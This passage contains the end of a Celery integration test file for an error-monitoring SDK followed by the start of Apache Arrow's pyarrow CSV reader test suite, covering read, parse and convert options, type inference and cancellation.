@celery.task(name="dummy_task")
def dummy_task():
with configure_scope() as scope:
scope.set_tag("foo", "bar")
results.append(42)
for _ in range(10000):
dummy_task.delay()
assert results == [42] * 10000
with configure_scope() as scope:
assert not scope._tags
def test_simple_no_propagation(capture_events, init_celery):
celery = init_celery(propagate_traces=False)
events = capture_events()
@celery.task(name="dummy_task")
def dummy_task():
1 / 0
with Hub.current.start_span() as span:
dummy_task.delay()
(event,) = events
assert event["contexts"]["trace"]["trace_id"] != span.trace_id
assert event["transaction"] == "dummy_task"
(exception,) = event["exception"]["values"]
assert exception["type"] == "ZeroDivisionError"
def test_ignore_expected(capture_events, celery):
events = capture_events()
@celery.task(name="dummy_task", throws=(ZeroDivisionError,))
def dummy_task(x, y):
return x / y
dummy_task.delay(1, 2)
dummy_task.delay(1, 0)
assert not events
def test_broken_prerun(init_celery, connect_signal):
from celery.signals import task_prerun
stack_lengths = []
def crash(*args, **kwargs):
# scope should exist in prerun
stack_lengths.append(len(Hub.current._stack))
1 / 0
# Order here is important to reproduce the bug: In Celery 3, a crashing
# prerun would prevent other preruns from running.
connect_signal(task_prerun, crash)
celery = init_celery()
assert len(Hub.current._stack) == 1
@celery.task(name="dummy_task")
def dummy_task(x, y):
stack_lengths.append(len(Hub.current._stack))
return x / y
if VERSION >= (4,):
dummy_task.delay(2, 2)
else:
with pytest.raises(ZeroDivisionError):
dummy_task.delay(2, 2)
assert len(Hub.current._stack) == 1
if VERSION < (4,):
assert stack_lengths == [2]
else:
assert stack_lengths == [2, 2]
@pytest.mark.xfail(
(4, 2, 0) <= VERSION,
strict=True,
reason="https://github.com/celery/celery/issues/4661",
)
def test_retry(celery, capture_events):
events = capture_events()
failures = [True, True, False]
runs = []
@celery.task(name="dummy_task", bind=True)
def dummy_task(self):
runs.append(1)
try:
if failures.pop(0):
1 / 0
except Exception as exc:
self.retry(max_retries=2, exc=exc)
dummy_task.delay()
assert len(runs) == 3
assert not events
failures = [True, True, True]
runs = []
dummy_task.delay()
assert len(runs) == 3
(event,) = events
exceptions = event["exception"]["values"]
for e in exceptions:
assert e["type"] == "ZeroDivisionError"
@pytest.mark.forked
@pytest.mark.skipif(VERSION < (4,), reason="in-memory backend broken")
def test_transport_shutdown(request, celery, capture_events_forksafe, tmpdir):
events = capture_events_forksafe()
celery.conf.worker_max_tasks_per_child = 1
celery.conf.broker_url = "memory://localhost/"
celery.conf.broker_backend = "memory"
celery.conf.result_backend = "file://{}".format(tmpdir.mkdir("celery-results"))
celery.conf.task_always_eager = False
runs = []
@celery.task(name="dummy_task", bind=True)
def dummy_task(self):
runs.append(1)
1 / 0
res = dummy_task.delay()
w = worker.worker(app=celery)
t = threading.Thread(target=w.run)
t.daemon = True
t.start()
with pytest.raises(Exception):
# Celery 4.1 raises a gibberish exception
res.wait()
event = events.read_event()
(exception,) = event["exception"]["values"]
assert exception["type"] == "ZeroDivisionError"
events.read_flush()
# if this is nonempty, the worker never really forked
assert not runs
|
test_csv.py
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import bz2
from datetime import date, datetime
from decimal import Decimal
import gc
import gzip
import io
import itertools
import os
import pickle
import shutil
import signal
import string
import sys
import tempfile
import threading
import time
import unittest
import pytest
import numpy as np
import pyarrow as pa
from pyarrow.csv import (
open_csv, read_csv, ReadOptions, ParseOptions, ConvertOptions, ISO8601,
write_csv, WriteOptions)
def generate_col_names():
# 'a', 'b'... 'z', then 'aa', 'ab'...
letters = string.ascii_lowercase
yield from letters
for first in letters:
for second in letters:
yield first + second
def make_random_csv(num_cols=2, num_rows=10, linesep='\r\n', write_names=True):
arr = np.random.RandomState(42).randint(0, 1000, size=(num_cols, num_rows))
csv = io.StringIO()
col_names = list(itertools.islice(generate_col_names(), num_cols))
if write_names:
csv.write(",".join(col_names))
csv.write(linesep)
for row in arr.T:
csv.write(",".join(map(str, row)))
csv.write(linesep)
csv = csv.getvalue().encode()
columns = [pa.array(a, type=pa.int64()) for a in arr]
expected = pa.Table.from_arrays(columns, col_names)
return csv, expected
def make_empty_csv(column_names):
csv = io.StringIO()
csv.write(",".join(column_names))
csv.write("\n")
return csv.getvalue().encode()
def check_options_class(cls, **attr_values):
"""
Check setting and getting attributes of an *Options class.
"""
opts = cls()
for name, values in attr_values.items():
assert getattr(opts, name) == values[0], \
"incorrect default value for " + name
for v in values:
setattr(opts, name, v)
assert getattr(opts, name) == v, "failed setting value"
with pytest.raises(AttributeError):
opts.zzz_non_existent = True
# Check constructor named arguments
non_defaults = {name: values[1] for name, values in attr_values.items()}
opts = cls(**non_defaults)
for name, value in non_defaults.items():
assert getattr(opts, name) == value
# The various options classes need to be picklable for dataset
def check_options_class_pickling(cls, **attr_values):
opts = cls(**attr_values)
new_opts = pickle.loads(pickle.dumps(opts,
protocol=pickle.HIGHEST_PROTOCOL))
for name, value in attr_values.items():
assert getattr(new_opts, name) == value
def test_read_options():
cls = ReadOptions
opts = cls()
check_options_class(cls, use_threads=[True, False],
skip_rows=[0, 3],
column_names=[[], ["ab", "cd"]],
autogenerate_column_names=[False, True],
encoding=['utf8', 'utf16'])
check_options_class_pickling(cls, use_threads=True,
skip_rows=3,
column_names=["ab", "cd"],
autogenerate_column_names=False,
encoding='utf16')
assert opts.block_size > 0
opts.block_size = 12345
assert opts.block_size == 12345
opts = cls(block_size=1234)
assert opts.block_size == 1234
def test_parse_options():
cls = ParseOptions
check_options_class(cls, delimiter=[',', 'x'],
escape_char=[False, 'y'],
quote_char=['"', 'z', False],
double_quote=[True, False],
newlines_in_values=[False, True],
ignore_empty_lines=[True, False])
check_options_class_pickling(cls, delimiter='x',
escape_char='y',
quote_char=False,
double_quote=False,
newlines_in_values=True,
ignore_empty_lines=False)
def test_convert_options():
cls = ConvertOptions
opts = cls()
check_options_class(
cls, check_utf8=[True, False],
strings_can_be_null=[False, True],
include_columns=[[], ['def', 'abc']],
include_missing_columns=[False, True],
auto_dict_encode=[False, True],
timestamp_parsers=[[], [ISO8601, '%y-%m']])
check_options_class_pickling(
cls, check_utf8=True,
strings_can_be_null=False,
include_columns=['def', 'abc'],
include_missing_columns=False,
auto_dict_encode=True,
timestamp_parsers=[ISO8601, '%y-%m'])
assert opts.auto_dict_max_cardinality > 0
opts.auto_dict_max_cardinality = 99999
assert opts.auto_dict_max_cardinality == 99999
assert opts.column_types == {}
# Pass column_types as mapping
opts.column_types = {'b': pa.int16(), 'c': pa.float32()}
assert opts.column_types == {'b': pa.int16(), 'c': pa.float32()}
opts.column_types = {'v': 'int16', 'w': 'null'}
assert opts.column_types == {'v': pa.int16(), 'w': pa.null()}
# Pass column_types as schema
schema = pa.schema([('a', pa.int32()), ('b', pa.string())])
opts.column_types = schema
assert opts.column_types == {'a': pa.int32(), 'b': pa.string()}
# Pass column_types as sequence
opts.column_types = [('x', pa.binary())]
assert opts.column_types == {'x': pa.binary()}
with pytest.raises(TypeError, match='DataType expected'):
opts.column_types = {'a': None}
with pytest.raises(TypeError):
opts.column_types = 0
assert isinstance(opts.null_values, list)
assert '' in opts.null_values
assert 'N/A' in opts.null_values
opts.null_values = ['xxx', 'yyy']
assert opts.null_values == ['xxx', 'yyy']
assert isinstance(opts.true_values, list)
opts.true_values = ['xxx', 'yyy']
assert opts.true_values == ['xxx', 'yyy']
assert isinstance(opts.false_values, list)
opts.false_values = ['xxx', 'yyy']
assert opts.false_values == ['xxx', 'yyy']
assert opts.timestamp_parsers == []
opts.timestamp_parsers = [ISO8601]
assert opts.timestamp_parsers == [ISO8601]
opts = cls(column_types={'a': pa.null()},
null_values=['N', 'nn'], true_values=['T', 'tt'],
false_values=['F', 'ff'], auto_dict_max_cardinality=999,
timestamp_parsers=[ISO8601, '%Y-%m-%d'])
assert opts.column_types == {'a': pa.null()}
assert opts.null_values == ['N', 'nn']
assert opts.false_values == ['F', 'ff']
assert opts.true_values == ['T', 'tt']
assert opts.auto_dict_max_cardinality == 999
assert opts.timestamp_parsers == [ISO8601, '%Y-%m-%d']
def test_write_options():
cls = WriteOptions
opts = cls()
check_options_class(
cls, include_header=[True, False])
assert opts.batch_size > 0
opts.batch_size = 12345
assert opts.batch_size == 12345
opts = cls(batch_size=9876)
assert opts.batch_size == 9876
class BaseTestCSVRead:
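    # Tests shared by the serial and parallel read_csv() test classes below;
    # subclasses provide self.read_csv().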
def read_bytes(self, b, **kwargs):
return self.read_csv(pa.py_buffer(b), **kwargs)
def check_names(self, table, names):
assert table.num_columns == len(names)
assert table.column_names == names
def test_file_object(self):
data = b"a,b\n1,2\n"
expected_data = {'a': [1], 'b': [2]}
bio = io.BytesIO(data)
table = self.read_csv(bio)
assert table.to_pydict() == expected_data
# Text files not allowed
sio = io.StringIO(data.decode())
with pytest.raises(TypeError):
self.read_csv(sio)
def test_header(self):
rows = b"abc,def,gh\n"
table = self.read_bytes(rows)
assert isinstance(table, pa.Table)
self.check_names(table, ["abc", "def", "gh"])
assert table.num_rows == 0
def test_bom(self):
rows = b"\xef\xbb\xbfa,b\n1,2\n"
expected_data = {'a': [1], 'b': [2]}
table = self.read_bytes(rows)
assert table.to_pydict() == expected_data
def test_one_chunk(self):
# ARROW-7661: lack of newline at end of file should not produce
# an additional chunk.
rows = [b"a,b", b"1,2", b"3,4", b"56,78"]
for line_ending in [b'\n', b'\r', b'\r\n']:
for file_ending in [b'', line_ending]:
data = line_ending.join(rows) + file_ending
table = self.read_bytes(data)
assert len(table.to_batches()) == 1
assert table.to_pydict() == {
"a": [1, 3, 56],
"b": [2, 4, 78],
}
def test_header_skip_rows(self):
rows = b"ab,cd\nef,gh\nij,kl\nmn,op\n"
opts = ReadOptions()
opts.skip_rows = 1
table = self.read_bytes(rows, read_options=opts)
self.check_names(table, ["ef", "gh"])
assert table.to_pydict() == {
"ef": ["ij", "mn"],
"gh": ["kl", "op"],
}
opts.skip_rows = 3
table = self.read_bytes(rows, read_options=opts)
self.check_names(table, ["mn", "op"])
assert table.to_pydict() == {
"mn": [],
"op": [],
}
opts.skip_rows = 4
with pytest.raises(pa.ArrowInvalid):
# Not enough rows
table = self.read_bytes(rows, read_options=opts)
# Can skip rows with a different number of columns
rows = b"abcd\n,,,,,\nij,kl\nmn,op\n"
opts.skip_rows = 2
table = self.read_bytes(rows, read_options=opts)
self.check_names(table, ["ij", "kl"])
assert table.to_pydict() == {
"ij": ["mn"],
"kl": ["op"],
}
def test_header_column_names(self):
rows = b"ab,cd\nef,gh\nij,kl\nmn,op\n"
opts = ReadOptions()
opts.column_names = ["x", "y"]
table = self.read_bytes(rows, read_options=opts)
self.check_names(table, ["x", "y"])
assert table.to_pydict() == {
"x": ["ab", "ef", "ij", "mn"],
"y": ["cd", "gh", "kl", "op"],
}
opts.skip_rows = 3
table = self.read_bytes(rows, read_options=opts)
self.check_names(table, ["x", "y"])
assert table.to_pydict() == {
"x": ["mn"],
"y": ["op"],
}
opts.skip_rows = 4
table = self.read_bytes(rows, read_options=opts)
self.check_names(table, ["x", "y"])
assert table.to_pydict() == {
"x": [],
"y": [],
}
opts.skip_rows = 5
with pytest.raises(pa.ArrowInvalid):
# Not enough rows
table = self.read_bytes(rows, read_options=opts)
# Unexpected number of columns
opts.skip_rows = 0
opts.column_names = ["x", "y", "z"]
with pytest.raises(pa.ArrowInvalid,
match="Expected 3 columns, got 2"):
table = self.read_bytes(rows, read_options=opts)
# Can skip rows with a different number of columns
rows = b"abcd\n,,,,,\nij,kl\nmn,op\n"
opts.skip_rows = 2
opts.column_names = ["x", "y"]
table = self.read_bytes(rows, read_options=opts)
self.check_names(table, ["x", "y"])
assert table.to_pydict() == {
"x": ["ij", "mn"],
"y": ["kl", "op"],
}
def test_header_autogenerate_column_names(self):
rows = b"ab,cd\nef,gh\nij,kl\nmn,op\n"
opts = ReadOptions()
opts.autogenerate_column_names = True
table = self.read_bytes(rows, read_options=opts)
self.check_names(table, ["f0", "f1"])
assert table.to_pydict() == {
"f0": ["ab", "ef", "ij", "mn"],
"f1": ["cd", "gh", "kl", "op"],
}
opts.skip_rows = 3
table = self.read_bytes(rows, read_options=opts)
self.check_names(table, ["f0", "f1"])
assert table.to_pydict() == {
"f0": ["mn"],
"f1": ["op"],
}
# Not enough rows, impossible to infer number of columns
opts.skip_rows = 4
with pytest.raises(pa.ArrowInvalid):
table = self.read_bytes(rows, read_options=opts)
def test_include_columns(self):
rows = b"ab,cd\nef,gh\nij,kl\nmn,op\n"
convert_options = ConvertOptions()
convert_options.include_columns = ['ab']
table = self.read_bytes(rows, convert_options=convert_options)
self.check_names(table, ["ab"])
assert table.to_pydict() == {
"ab": ["ef", "ij", "mn"],
}
# Order of include_columns is respected, regardless of CSV order
convert_options.include_columns = ['cd', 'ab']
table = self.read_bytes(rows, convert_options=convert_options)
schema = pa.schema([('cd', pa.string()),
('ab', pa.string())])
assert table.schema == schema
assert table.to_pydict() == {
"cd": ["gh", "kl", "op"],
"ab": ["ef", "ij", "mn"],
}
# Include a column not in the CSV file => raises by default
convert_options.include_columns = ['xx', 'ab', 'yy']
with pytest.raises(KeyError,
match="Column 'xx' in include_columns "
"does not exist in CSV file"):
self.read_bytes(rows, convert_options=convert_options)
def test_include_missing_columns(self):
rows = b"ab,cd\nef,gh\nij,kl\nmn,op\n"
read_options = ReadOptions()
convert_options = ConvertOptions()
convert_options.include_columns = ['xx', 'ab', 'yy']
convert_options.include_missing_columns = True
table = self.read_bytes(rows, read_options=read_options,
convert_options=convert_options)
schema = pa.schema([('xx', pa.null()),
('ab', pa.string()),
('yy', pa.null())])
assert table.schema == schema
assert table.to_pydict() == {
"xx": [None, None, None],
"ab": ["ef", "ij", "mn"],
"yy": [None, None, None],
}
# Combining with `column_names`
read_options.column_names = ["xx", "yy"]
convert_options.include_columns = ["yy", "cd"]
table = self.read_bytes(rows, read_options=read_options,
convert_options=convert_options)
schema = pa.schema([('yy', pa.string()),
('cd', pa.null())])
assert table.schema == schema
assert table.to_pydict() == {
"yy": ["cd", "gh", "kl", "op"],
"cd": [None, None, None, None],
}
# And with `column_types` as well
convert_options.column_types = {"yy": pa.binary(),
"cd": pa.int32()}
table = self.read_bytes(rows, read_options=read_options,
convert_options=convert_options)
schema = pa.schema([('yy', pa.binary()),
('cd', pa.int32())])
assert table.schema == schema
assert table.to_pydict() == {
"yy": [b"cd", b"gh", b"kl", b"op"],
"cd": [None, None, None, None],
}
def test_simple_ints(self):
# Infer integer columns
rows = b"a,b,c\n1,2,3\n4,5,6\n"
table = self.read_bytes(rows)
schema = pa.schema([('a', pa.int64()),
('b', pa.int64()),
('c', pa.int64())])
assert table.schema == schema
assert table.to_pydict() == {
'a': [1, 4],
'b': [2, 5],
'c': [3, 6],
}
def test_simple_varied(self):
# Infer various kinds of data
rows = b"a,b,c,d\n1,2,3,0\n4.0,-5,foo,True\n"
table = self.read_bytes(rows)
schema = pa.schema([('a', pa.float64()),
('b', pa.int64()),
('c', pa.string()),
('d', pa.bool_())])
assert table.schema == schema
assert table.to_pydict() == {
'a': [1.0, 4.0],
'b': [2, -5],
'c': ["3", "foo"],
'd': [False, True],
}
def test_simple_nulls(self):
# Infer various kinds of data, with nulls
rows = (b"a,b,c,d,e,f\n"
b"1,2,,,3,N/A\n"
b"nan,-5,foo,,nan,TRUE\n"
b"4.5,#N/A,nan,,\xff,false\n")
table = self.read_bytes(rows)
schema = pa.schema([('a', pa.float64()),
('b', pa.int64()),
('c', pa.string()),
('d', pa.null()),
('e', pa.binary()),
('f', pa.bool_())])
assert table.schema == schema
assert table.to_pydict() == {
'a': [1.0, None, 4.5],
'b': [2, -5, None],
'c': ["", "foo", "nan"],
'd': [None, None, None],
'e': [b"3", b"nan", b"\xff"],
'f': [None, True, False],
}
def test_simple_timestamps(self):
# Infer a timestamp column
rows = (b"a,b,c\n"
b"1970,1970-01-01 00:00:00,1970-01-01 00:00:00.123\n"
b"1989,1989-07-14 01:00:00,1989-07-14 01:00:00.123456\n")
table = self.read_bytes(rows)
schema = pa.schema([('a', pa.int64()),
('b', pa.timestamp('s')),
('c', pa.timestamp('ns'))])
assert table.schema == schema
assert table.to_pydict() == {
'a': [1970, 1989],
'b': [datetime(1970, 1, 1), datetime(1989, 7, 14, 1)],
'c': [datetime(1970, 1, 1, 0, 0, 0, 123000),
datetime(1989, 7, 14, 1, 0, 0, 123456)],
}
def test_timestamp_parsers(self):
# Infer timestamps with custom parsers
rows = b"a,b\n1970/01/01,1980-01-01 00\n1970/01/02,1980-01-02 00\n"
opts = ConvertOptions()
table = self.read_bytes(rows, convert_options=opts)
schema = pa.schema([('a', pa.string()),
('b', pa.timestamp('s'))])
assert table.schema == schema
assert table.to_pydict() == {
'a': ['1970/01/01', '1970/01/02'],
'b': [datetime(1980, 1, 1), datetime(1980, 1, 2)],
}
opts.timestamp_parsers = ['%Y/%m/%d']
table = self.read_bytes(rows, convert_options=opts)
schema = pa.schema([('a', pa.timestamp('s')),
('b', pa.string())])
assert table.schema == schema
assert table.to_pydict() == {
'a': [datetime(1970, 1, 1), datetime(1970, 1, 2)],
'b': ['1980-01-01 00', '1980-01-02 00'],
}
opts.timestamp_parsers = ['%Y/%m/%d', ISO8601]
table = self.read_bytes(rows, convert_options=opts)
schema = pa.schema([('a', pa.timestamp('s')),
('b', pa.timestamp('s'))])
assert table.schema == schema
assert table.to_pydict() == {
'a': [datetime(1970, 1, 1), datetime(1970, 1, 2)],
'b': [datetime(1980, 1, 1), datetime(1980, 1, 2)],
}
def test_dates(self):
# Dates are inferred as date32 by default
rows = b"a,b\n1970-01-01,1970-01-02\n1971-01-01,1971-01-02\n"
table = self.read_bytes(rows)
schema = pa.schema([('a', pa.date32()),
('b', pa.date32())])
assert table.schema == schema
assert table.to_pydict() == {
'a': [date(1970, 1, 1), date(1971, 1, 1)],
'b': [date(1970, 1, 2), date(1971, 1, 2)],
}
# Can ask for date types explicitly
opts = ConvertOptions()
opts.column_types = {'a': pa.date32(), 'b': pa.date64()}
table = self.read_bytes(rows, convert_options=opts)
schema = pa.schema([('a', pa.date32()),
('b', pa.date64())])
assert table.schema == schema
assert table.to_pydict() == {
'a': [date(1970, 1, 1), date(1971, 1, 1)],
'b': [date(1970, 1, 2), date(1971, 1, 2)],
}
# Can ask for timestamp types explicitly
opts = ConvertOptions()
opts.column_types = {'a': pa.timestamp('s'), 'b': pa.timestamp('ms')}
table = self.read_bytes(rows, convert_options=opts)
schema = pa.schema([('a', pa.timestamp('s')),
('b', pa.timestamp('ms'))])
assert table.schema == schema
assert table.to_pydict() == {
'a': [datetime(1970, 1, 1), datetime(1971, 1, 1)],
'b': [datetime(1970, 1, 2), datetime(1971, 1, 2)],
}
def test_auto_dict_encode(self):
opts = ConvertOptions(auto_dict_encode=True)
rows = "a,b\nab,1\ncdé,2\ncdé,3\nab,4".encode()
table = self.read_bytes(rows, convert_options=opts)
schema = pa.schema([('a', pa.dictionary(pa.int32(), pa.string())),
('b', pa.int64())])
expected = {
'a': ["ab", "cdé", "cdé", "ab"],
'b': [1, 2, 3, 4],
}
assert table.schema == schema
assert table.to_pydict() == expected
opts.auto_dict_max_cardinality = 2
table = self.read_bytes(rows, convert_options=opts)
assert table.schema == schema
assert table.to_pydict() == expected
# Cardinality above max => plain-encoded
opts.auto_dict_max_cardinality = 1
table = self.read_bytes(rows, convert_options=opts)
assert table.schema == pa.schema([('a', pa.string()),
('b', pa.int64())])
assert table.to_pydict() == expected
# With invalid UTF8, not checked
opts.auto_dict_max_cardinality = 50
opts.check_utf8 = False
rows = b"a,b\nab,1\ncd\xff,2\nab,3"
table = self.read_bytes(rows, convert_options=opts,
validate_full=False)
assert table.schema == schema
dict_values = table['a'].chunk(0).dictionary
assert len(dict_values) == 2
assert dict_values[0].as_py() == "ab"
assert dict_values[1].as_buffer() == b"cd\xff"
# With invalid UTF8, checked
opts.check_utf8 = True
table = self.read_bytes(rows, convert_options=opts)
schema = pa.schema([('a', pa.dictionary(pa.int32(), pa.binary())),
('b', pa.int64())])
expected = {
'a': [b"ab", b"cd\xff", b"ab"],
'b': [1, 2, 3],
}
assert table.schema == schema
assert table.to_pydict() == expected
def test_custom_nulls(self):
# Infer nulls with custom values
opts = ConvertOptions(null_values=['Xxx', 'Zzz'])
rows = b"a,b,c,d\nZzz,Xxx,1,2\nXxx,#N/A,,Zzz\n"
table = self.read_bytes(rows, convert_options=opts)
schema = pa.schema([('a', pa.null()),
('b', pa.string()),
('c', pa.string()),
('d', pa.int64())])
assert table.schema == schema
assert table.to_pydict() == {
'a': [None, None],
'b': ["Xxx", "#N/A"],
'c': ["1", ""],
'd': [2, None],
}
opts = ConvertOptions(null_values=['Xxx', 'Zzz'],
strings_can_be_null=True)
table = self.read_bytes(rows, convert_options=opts)
assert table.to_pydict() == {
'a': [None, None],
'b': [None, "#N/A"],
'c': ["1", ""],
'd': [2, None],
}
opts = ConvertOptions(null_values=[])
rows = b"a,b\n#N/A,\n"
table = self.read_bytes(rows, convert_options=opts)
schema = pa.schema([('a', pa.string()),
('b', pa.string())])
assert table.schema == schema
assert table.to_pydict() == {
'a': ["#N/A"],
'b': [""],
}
def test_custom_bools(self):
# Infer booleans with custom values
opts = ConvertOptions(true_values=['T', 'yes'],
false_values=['F', 'no'])
rows = (b"a,b,c\n"
b"True,T,t\n"
b"False,F,f\n"
b"True,yes,yes\n"
b"False,no,no\n"
b"N/A,N/A,N/A\n")
table = self.read_bytes(rows, convert_options=opts)
schema = pa.schema([('a', pa.string()),
('b', pa.bool_()),
('c', pa.string())])
assert table.schema == schema
assert table.to_pydict() == {
'a': ["True", "False", "True", "False", "N/A"],
'b': [True, False, True, False, None],
'c': ["t", "f", "yes", "no", "N/A"],
}
def test_column_types(self):
# Ask for specific column types in ConvertOptions
opts = ConvertOptions(column_types={'b': 'float32',
'c': 'string',
'd': 'boolean',
'e': pa.decimal128(11, 2),
'zz': 'null'})
rows = b"a,b,c,d,e\n1,2,3,true,1.0\n4,-5,6,false,0\n"
table = self.read_bytes(rows, convert_options=opts)
schema = pa.schema([('a', pa.int64()),
('b', pa.float32()),
('c', pa.string()),
('d', pa.bool_()),
('e', pa.decimal128(11, 2))])
expected = {
'a': [1, 4],
'b': [2.0, -5.0],
'c': ["3", "6"],
'd': [True, False],
'e': [Decimal("1.00"), Decimal("0.00")]
}
assert table.schema == schema
assert table.to_pydict() == expected
# Pass column_types as schema
opts = ConvertOptions(
column_types=pa.schema([('b', pa.float32()),
('c', pa.string()),
('d', pa.bool_()),
('e', pa.decimal128(11, 2)),
('zz', pa.bool_())]))
table = self.read_bytes(rows, convert_options=opts)
assert table.schema == schema
assert table.to_pydict() == expected
# One of the columns in column_types fails converting
rows = b"a,b,c,d,e\n1,XXX,3,true,5\n4,-5,6,false,7\n"
with pytest.raises(pa.ArrowInvalid) as exc:
self.read_bytes(rows, convert_options=opts)
err = str(exc.value)
assert "In CSV column #1: " in err
assert "CSV conversion error to float: invalid value 'XXX'" in err
def test_column_types_dict(self):
# Ask for dict-encoded column types in ConvertOptions
column_types = [
('a', pa.dictionary(pa.int32(), pa.utf8())),
('b', pa.dictionary(pa.int32(), pa.int64())),
('c', pa.dictionary(pa.int32(), pa.decimal128(11, 2))),
('d', pa.dictionary(pa.int32(), pa.large_utf8()))]
opts = ConvertOptions(column_types=dict(column_types))
rows = (b"a,b,c,d\n"
b"abc,123456,1.0,zz\n"
b"defg,123456,0.5,xx\n"
b"abc,N/A,1.0,xx\n")
table = self.read_bytes(rows, convert_options=opts)
schema = pa.schema(column_types)
expected = {
'a': ["abc", "defg", "abc"],
'b': [123456, 123456, None],
'c': [Decimal("1.00"), Decimal("0.50"), Decimal("1.00")],
'd': ["zz", "xx", "xx"],
}
assert table.schema == schema
assert table.to_pydict() == expected
# Unsupported index type
column_types[0] = ('a', pa.dictionary(pa.int8(), pa.utf8()))
opts = ConvertOptions(column_types=dict(column_types))
with pytest.raises(NotImplementedError):
table = self.read_bytes(rows, convert_options=opts)
def test_column_types_with_column_names(self):
# When both `column_names` and `column_types` are given, names
# in `column_types` should refer to names in `column_names`
rows = b"a,b\nc,d\ne,f\n"
read_options = ReadOptions(column_names=['x', 'y'])
convert_options = ConvertOptions(column_types={'x': pa.binary()})
table = self.read_bytes(rows, read_options=read_options,
convert_options=convert_options)
schema = pa.schema([('x', pa.binary()),
('y', pa.string())])
assert table.schema == schema
assert table.to_pydict() == {
'x': [b'a', b'c', b'e'],
'y': ['b', 'd', 'f'],
}
def test_no_ending_newline(self):
# No \n after last line
rows = b"a,b,c\n1,2,3\n4,5,6"
table = self.read_bytes(rows)
assert table.to_pydict() == {
'a': [1, 4],
'b': [2, 5],
'c': [3, 6],
}
def test_trivial(self):
# A bit pointless, but at least it shouldn't crash
rows = b",\n\n"
table = self.read_bytes(rows)
assert table.to_pydict() == {'': []}
def test_empty_lines(self):
rows = b"a,b\n\r1,2\r\n\r\n3,4\r\n"
table = self.read_bytes(rows)
assert table.to_pydict() == {
'a': [1, 3],
'b': [2, 4],
}
parse_options = ParseOptions(ignore_empty_lines=False)
table = self.read_bytes(rows, parse_options=parse_options)
assert table.to_pydict() == {
'a': [None, 1, None, 3],
'b': [None, 2, None, 4],
}
read_options = ReadOptions(skip_rows=2)
table = self.read_bytes(rows, parse_options=parse_options,
read_options=read_options)
assert table.to_pydict() == {
'1': [None, 3],
'2': [None, 4],
}
def test_invalid_csv(self):
# Various CSV errors
rows = b"a,b,c\n1,2\n4,5,6\n"
with pytest.raises(pa.ArrowInvalid, match="Expected 3 columns, got 2"):
self.read_bytes(rows)
rows = b"a,b,c\n1,2,3\n4"
with pytest.raises(pa.ArrowInvalid, match="Expected 3 columns, got 1"):
self.read_bytes(rows)
for rows in [b"", b"\n", b"\r\n", b"\r", b"\n\n"]:
with pytest.raises(pa.ArrowInvalid, match="Empty CSV file"):
self.read_bytes(rows)
def test_options_delimiter(self):
rows = b"a;b,c\nde,fg;eh\n"
table = self.read_bytes(rows)
assert table.to_pydict() == {
'a;b': ['de'],
'c': ['fg;eh'],
}
opts = ParseOptions(delimiter=';')
table = self.read_bytes(rows, parse_options=opts)
assert table.to_pydict() == {
'a': ['de,fg'],
'b,c': ['eh'],
}
def test_small_random_csv(self):
csv, expected = make_random_csv(num_cols=2, num_rows=10)
table = self.read_bytes(csv)
assert table.schema == expected.schema
assert table.equals(expected)
assert table.to_pydict() == expected.to_pydict()
def test_stress_block_sizes(self):
# Test a number of small block sizes to stress block stitching
csv_base, expected = make_random_csv(num_cols=2, num_rows=500)
block_sizes = [11, 12, 13, 17, 37, 111]
csvs = [csv_base, csv_base.rstrip(b'\r\n')]
for csv in csvs:
for block_size in block_sizes:
read_options = ReadOptions(block_size=block_size)
table = self.read_bytes(csv, read_options=read_options)
assert table.schema == expected.schema
if not table.equals(expected):
# Better error output
assert table.to_pydict() == expected.to_pydict()
def test_stress_convert_options_blowup(self):
# ARROW-6481: A convert_options with a very large number of columns
# should not blow memory and CPU time.
try:
clock = time.thread_time
except AttributeError:
clock = time.time
num_columns = 10000
col_names = ["K{}".format(i) for i in range(num_columns)]
csv = make_empty_csv(col_names)
t1 = clock()
convert_options = ConvertOptions(
column_types={k: pa.string() for k in col_names[::2]})
table = self.read_bytes(csv, convert_options=convert_options)
dt = clock() - t1
# Check that processing time didn't blow up.
# This is a conservative check (it takes less than 300 ms
# in debug mode on my local machine).
assert dt <= 10.0
# Check result
assert table.num_columns == num_columns
assert table.num_rows == 0
assert table.column_names == col_names
def test_cancellation(self):
if (threading.current_thread().ident !=
threading.main_thread().ident):
pytest.skip("test only works from main Python thread")
if sys.version_info >= (3, 8):
raise_signal = signal.raise_signal
elif os.name == 'nt':
# On Windows, os.kill() doesn't actually send a signal,
# it just terminates the process with the given exit code.
pytest.skip("test requires Python 3.8+ on Windows")
else:
# On Unix, emulate raise_signal() with os.kill().
def raise_signal(signum):
os.kill(os.getpid(), signum)
# Make the interruptible workload large enough to not finish
# before the interrupt comes, even in release mode on fast machines
large_csv = b"a,b,c\n" + b"1,2,3\n" * 200_000_000
def signal_from_thread():
time.sleep(0.2)
raise_signal(signal.SIGINT)
t1 = time.time()
try:
try:
t = threading.Thread(target=signal_from_thread)
with pytest.raises(KeyboardInterrupt) as exc_info:
t.start()
self.read_bytes(large_csv)
finally:
t.join()
except KeyboardInterrupt:
# In case KeyboardInterrupt didn't interrupt `self.read_bytes`
# above, at least prevent it from stopping the test suite
self.fail("KeyboardInterrupt didn't interrupt CSV reading")
dt = time.time() - t1
assert dt <= 1.0
e = exc_info.value.__context__
assert isinstance(e, pa.ArrowCancelled)
assert e.signum == signal.SIGINT
def test_cancellation_disabled(self):
# ARROW-12622: reader would segfault when the cancelling signal
# handler was not enabled (e.g. if disabled, or if not on the
# main thread)
t = threading.Thread(target=lambda: self.read_bytes(b"f64\n0.1"))
t.start()
t.join()
class TestSerialCSVRead(BaseTestCSVRead, unittest.TestCase):
def read_csv(self, *args, validate_full=True, **kwargs):
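        # Force single-threaded reading; validate the resulting table (fully by default).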
read_options = kwargs.setdefault('read_options', ReadOptions())
read_options.use_threads = False
table = read_csv(*args, **kwargs)
table.validate(full=validate_full)
return table
def test_row_numbers_in_errors(self):
""" Row numbers are only correctly counted in serial reads """
csv, _ = make_random_csv(4, 100, write_names=True)
read_options = ReadOptions()
read_options.block_size = len(csv) / 3
